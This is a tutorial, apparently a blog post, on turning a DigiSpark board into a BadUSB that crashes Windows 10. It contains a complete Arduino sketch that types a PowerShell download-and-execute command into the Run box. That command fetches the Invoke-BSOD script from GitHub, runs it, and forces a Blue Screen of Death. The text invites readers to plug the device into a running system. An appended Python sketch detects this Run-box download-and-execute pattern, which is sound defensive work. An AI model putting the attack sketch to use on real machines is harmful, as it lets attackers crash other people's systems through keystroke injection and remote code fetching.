Crashing Windows 10 systems using BadUSB

Disclaimer

This article has been provided solely for educational reasons, and the author is not responsible for any harm done to other computer systems through the malicious usage of this information.

What is BadUSB?

BadUSB refers to USB devices running reprogrammed firmware that allows them to act as a human interface device (HID). Examples of HIDs include keyboards and mice. This means that such a device can perform the same tasks as a real one, emulating the functionality of a computer mouse or sending keystrokes the same way a keyboard would. Using this ability, BadUSB devices have the potential to perform malicious activity on the target machine. Today, we are going to look at how one can create a BadUSB and use it to crash Windows 10 systems.

Requirements

First, you must obtain a DigiSpark ATTINY85. These USB development boards are fairly cheap. If you’re willing to wait a long time for the delivery, you can order a board from China for only a few dollars from websites like eBay.

Once you have your DigiSpark ATTINY85, install Arduino and follow these instructions for how to prepare your IDE so you can upload code to your board. This code will be run as soon as the USB device gets plugged into the machine and registered as an HID.

Setup

Now that you have your DigiSpark board and your Arduino IDE ready to upload code, it is time to make Windows 10 systems encounter the Blue Screen of Death (BSOD), effectively crashing the system and forcing a reboot. Go ahead and upload this BadBSOD Arduino sketch from my GitLab:

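    #include "DigiKeyboard.h"

    void setup() {
      // The on-board LED sits on pin 1; it must be an output to flash at full brightness
      pinMode(1, OUTPUT);
    }

    void loop() {
      // Dummy keystroke so the first real character after a delay is not dropped
      DigiKeyboard.sendKeyStroke(0);
      DigiKeyboard.delay(500);
      // Windows key + R opens the Run dialog
      DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
      DigiKeyboard.delay(500);
      // Type the PowerShell command that downloads and runs Invoke-BSOD
      DigiKeyboard.print("powershell IEX((New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-BSOD/master/Invoke-BSOD.ps1'));Invoke-BSOD");
      DigiKeyboard.sendKeyStroke(KEY_ENTER);
      for (;;) { // We are done, flash the LED forever
        digitalWrite(1, HIGH);
        delay(300);
        digitalWrite(1, LOW);
        delay(300);
      }
    }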

Let’s go over what is happening in the BadBSOD code. First, a keystroke with the dummy value of 0 is sent. While generally not necessary, omitting it may cause the first character after a delay to not be received properly. Next, we wait 500 ms for that to take effect. After this, keystrokes KEY_R and MOD_GUI_LEFT are sent in combination. This is the same as pressing the Windows key and the letter R at the same time, bringing up the “RUN” box where commands can be run. After waiting again for the system to process our keystrokes, a payload is sent via PowerShell. This payload will download a standalone PowerShell script (found here) that raises a hard error on Windows 10 and causes the BSOD. All of this is done without requiring any administrative privileges, and it’s unlikely to be patched since it’s simply an undocumented feature. To finish off, we send the Enter keystroke which executes the command, and flash the LED on the DigiSpark board to indicate that the code has finished executing.

Results

Now that you have your DigiSpark USB board running the BadBSOD sketch, simply plug it into a Windows 10 system that’s powered on and watch it do its job!

You should see the “RUN” dialog box open, followed by input being entered from seemingly nowhere. After a brief pause, the system will come to a halt with the dreaded Blue Screen of Death error. You may be wondering if anything can be done to protect yourself or others from a BadUSB attack. Obviously, you should not plug just any USB device into your computer. However, another solution involves USB condoms. A USB condom will prevent any data transfer from happening over a USB port. This is very useful whether you want to protect yourself from BadUSB attacks, juice jacking, or more!
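On the detection side, the sequence described above leaves a recognisable trace: PowerShell started by explorer.exe (the parent of anything launched from the Run box) with a download-and-execute command line. The following Python sketch is an added example, not code from the original article; it flags that pattern in process-creation events and raises the severity when a keyboard-class device arrived shortly before. The field names are modelled on Sysmon process-creation events, while the normalized event schema, the 30-second window, the placeholder URL and the sample records are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

EXEC = re.compile(r"(?i)\b(iex|invoke-expression)\b")  # runs a string as code
FETCH = re.compile(r"(?i)\b(downloadstring|invoke-webrequest|invoke-restmethod)\b")  # fetches it
SHELLS = ("\\powershell.exe", "\\pwsh.exe")
WINDOW = timedelta(seconds=30)  # assumption: a keyboard plugged in this recently is suspicious

def ts(ev):
    return datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S")

def is_run_dialog_cradle(ev):
    """PowerShell started by explorer.exe (as the Run box does) with a download-and-execute command."""
    if ev.get("type") != "process_create":
        return False
    cmd = ev["CommandLine"]
    return (ev["ParentImage"].lower().endswith("\\explorer.exe")
            and ev["Image"].lower().endswith(SHELLS)
            and bool(EXEC.search(cmd)) and bool(FETCH.search(cmd)))

def detect(events):
    """One alert per matching process; 'high' if a keyboard arrived within WINDOW before it."""
    alerts, last_keyboard = [], None
    for ev in sorted(events, key=ts):
        if ev.get("type") == "device_arrival" and ev.get("class") == "Keyboard":
            last_keyboard = ts(ev)
        elif is_run_dialog_cradle(ev):
            recent = last_keyboard is not None and ts(ev) - last_keyboard <= WINDOW
            alerts.append({"time": ev["UtcTime"], "severity": "high" if recent else "medium"})
    return alerts

# Constructed sample events (hypothetical normalized schema; the URL is a placeholder).
CRADLE_CMD = "powershell IEX((New-Object Net.WebClient).DownloadString('https://example.invalid/x.ps1'))"
EXPLORER = r"C:\Windows\explorer.exe"
CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

def proc(time, parent, cmdline):
    return {"type": "process_create", "UtcTime": time, "ParentImage": parent,
            "Image": PS, "CommandLine": cmdline}

SAMPLE_EVENTS = [
    {"type": "device_arrival", "UtcTime": "2024-01-01 10:00:00", "class": "Keyboard"},
    proc("2024-01-01 10:00:02", EXPLORER, CRADLE_CMD),                  # keyboard 2 s earlier
    proc("2024-01-01 11:00:00", EXPLORER, "powershell Get-ChildItem"),  # benign Run-box use
    proc("2024-01-01 12:00:00", EXPLORER, CRADLE_CMD),                  # no recent device
    proc("2024-01-01 12:05:00", CMD, CRADLE_CMD),                       # not from the Run box
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The last sample record is deliberately not flagged: its parent is cmd.exe, so it falls outside this Run-box rule and would need a separate cradle rule.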
